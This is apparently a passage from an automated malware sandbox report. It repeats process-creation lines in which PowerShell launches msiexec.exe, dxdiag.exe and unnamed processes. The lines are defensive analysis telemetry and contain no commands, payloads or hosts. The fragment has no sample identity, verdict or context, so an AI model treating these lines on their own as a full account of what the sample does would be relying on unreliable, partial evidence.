    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
